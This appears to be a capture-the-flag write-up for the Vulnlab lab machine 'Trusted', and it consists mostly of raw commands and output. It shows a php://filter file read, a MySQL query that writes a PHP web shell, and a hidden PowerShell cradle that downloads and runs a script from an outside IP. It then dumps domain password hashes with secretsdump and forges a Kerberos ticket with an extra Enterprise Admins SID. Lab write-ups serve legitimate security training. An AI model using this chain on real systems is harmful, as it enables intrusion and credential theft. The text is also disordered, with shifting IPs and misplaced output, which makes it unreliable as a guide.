Trusted is an easy-level machine from Vulnlab. The challenge involves exploiting a web vulnerability to gain an initial foothold on the server, escalating privileges to obtain administrative access, and moving laterally to the domain controller by leveraging a parent-child domain relationship.
Enumeration
We begin by scanning the two identified IPs using nmap.
| IP | Hostname | Domain | Notes |
|---|---|---|---|
| 10.10.234.5 | trusteddc | trusted.vl | Parent Domain |
| 10.10.234.6 | labdc | lab.trusted.vl | Child Domain |
Scanning 10.10.234.5
sudo nmap -sC -sV -oA 10.10.248.101 10.10.248.102
The scan reveals that this machine is the domain controller TrustedDC.
Scanning 10.10.234.6
sudo nmap -sC -sV -oA 10.10.234.6 10.10.234.6
The results indicate that this machine is another domain controller, LABDC. The scans confirm the existence of two domains, trusted.vl and lab.trusted.vl, configured in a parent-child relationship.
Enumeration
As we saw port 80 open on the machine LABDC machine we will start enumerating it further.
feroxbuster -k -u http://10.10.248.102:80 -C 404,405,410 -m GET,POST -e -x php,html,txt
https://10.10.181.134/dev/index.html?view=php://filter/convert.base64-encode/resource=db.php
- base64 decode using cyberchef
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
80/tcp open http syn-ack Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-title: Welcome to XAMPP
|_Requested resource was http://10.10.181.134/dashboard/
|_http-favicon: Unknown favicon MD5: 56F7C04657931F2D0B79371B2D6E9820
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2024-05-01 08:02:09Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
443/tcp open ssl/http syn-ack Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
3306/tcp open mysql syn-ack MySQL 5.5.5-10.4.24-
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal
| rdp-ntlm-info:
| Target_Name: LAB
| NetBIOS_Domain_Name: LAB
| NetBIOS_Computer_Name: LABDC
| DNS_Domain_Name: lab.trusted.vl
| DNS_Computer_Name: labdc.lab.trusted.vl
| DNS_Tree_Name: trusted.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-05-01T08:03:06+00:00
|_ssl-date: 2024-05-01T08:03:13+00:00; +6s from scanner time.
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack .NET Message Framing
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Nmap scan report for 10.10.181.133
Host is up, received user-set (0.10s latency).
Scanned at 2024-05-01 04:03:11 EDT for 69s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal
| rdp-ntlm-info:
| Target_Name: TRUSTED
| NetBIOS_Domain_Name: TRUSTED
| NetBIOS_Computer_Name: TRUSTEDDC
| DNS_Domain_Name: trusted.vl
| DNS_Computer_Name: trusteddc.trusted.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-05-01T08:04:15+00:00
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack .NET Message Framing
user@parrot:~/vulnlab/trusted % addcomputer.py -dc-ip 10.10.136.230 lab.trusted.vl/rsmith:IHateEric2
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account DESKTOP-H2BL6QM4$ with password NsgCSArVrMNabsdxw7cBpDuDK9DxsA6I.
(New-Object System.Net.WebClient).DownloadString("http://10.8.2.41/amsi64.txt") | IEX
Webshell
As the mysql port is open, the db is running as root and via the php info file we can write a web shell to our dev location and RCE.
select '<?php echo "command: " . system($_REQUEST["cmd"]); ?>' into outfile "C:\\xampp\\htdocs\\dev\\shell.php";cmd=powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.41/amsi64.txt');
| username | hash |
|---|---|
| TRUSTEDDC$ | |
| cpowers | 322db798a55f85f09b3d61b976a13c43 |
| LABDC$ | b24ebda0603c6eb41852654caf59cdee |
| LABDC$ | c09bb2eac3477dd3821d956ba314c3af |
secretsdump.py 'LABDC$'@10.10.244.198 -hashes c09bb2eac3477dd3821d956ba314c3af:c09bb2eac3477dd3821d956ba314c3af
Administrator:500:aad3b435b51404eeaad3b435b51404ee:75878369ad33f35b7070ca854100bc07:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c7a03c565c68c6fac5f8913fab576ebd:::
lab.trusted.vl\rsmith:1104:aad3b435b51404eeaad3b435b51404ee:30ef48d2054363df9244bc0d476e93dd:::
lab.trusted.vl\ewalters:1106:aad3b435b51404eeaad3b435b51404ee:56d93bd5a8250652c7430a4467a8540a:::
lab.trusted.vl\cpowers:1107:aad3b435b51404eeaad3b435b51404ee:322db798a55f85f09b3d61b976a13c43:::
LABDC$:1000:aad3b435b51404eeaad3b435b51404ee:c09bb2eac3477dd3821d956ba314c3af:::
TRUSTED$:1103:aad3b435b51404eeaad3b435b51404ee:eb35214e0dee200982af13a2239b9300:::
sharpview Get-ForestDomain
lookupsid.py lab.trused.vl/cpowers@10.10.244.198 -hashes aad3b435b51404eeaad3b435b51404ee:322db798a55f85f09b3d61b976a13c43
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Brute forcing SIDs at 10.10.244.198
[*] StringBinding ncacn_np:10.10.244.198[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2241985869-2159962460-1278545866
500: LAB\Administrator (SidTypeUser)
501: LAB\Guest (SidTypeUser)
502: LAB\krbtgt (SidTypeUser)
512: LAB\Domain Admins (SidTypeGroup)
513: LAB\Domain Users (SidTypeGroup)
514: LAB\Domain Guests (SidTypeGroup)
515: LAB\Domain Computers (SidTypeGroup)
516: LAB\Domain Controllers (SidTypeGroup)
517: LAB\Cert Publishers (SidTypeAlias)
520: LAB\Group Policy Creator Owners (SidTypeGroup)
521: LAB\Read-only Domain Controllers (SidTypeGroup)
522: LAB\Cloneable Domain Controllers (SidTypeGroup)
525: LAB\Protected Users (SidTypeGroup)
526: LAB\Key Admins (SidTypeGroup)
553: LAB\RAS and IAS Servers (SidTypeAlias)
571: LAB\Allowed RODC Password Replication Group (SidTypeAlias)
572: LAB\Denied RODC Password Replication Group (SidTypeAlias)
1000: LAB\LABDC$ (SidTypeUser)
1101: LAB\DnsAdmins (SidTypeAlias)
1102: LAB\DnsUpdateProxy (SidTypeGroup)
1103: LAB\TRUSTED$ (SidTypeUser)
1104: LAB\rsmith (SidTypeUser)
1106: LAB\ewalters (SidTypeUser)
1107: LAB\cpowers (SidTypeUser)
sharpview Get-NetGroup -GroupName "Enterprise Admins" -Domain "trusted.vl"
S-1-5-21-3576695518-347000760-3731839591
ticketer.py -nthash c7a03c565c68c6fac5f8913fab576ebd -domain lab.trusted.vl -domain-sid S-1-5-21-2241985869-2159962460-1278545866 -extra-sid S-1-5-21-3576695518-347000760-3731839591-519 Administrator
secretsdump.py lab.trusted.vl/Administrator@TRUSTEDDC.trusted.vl -k -no-pass -target-ip 10.10.244.197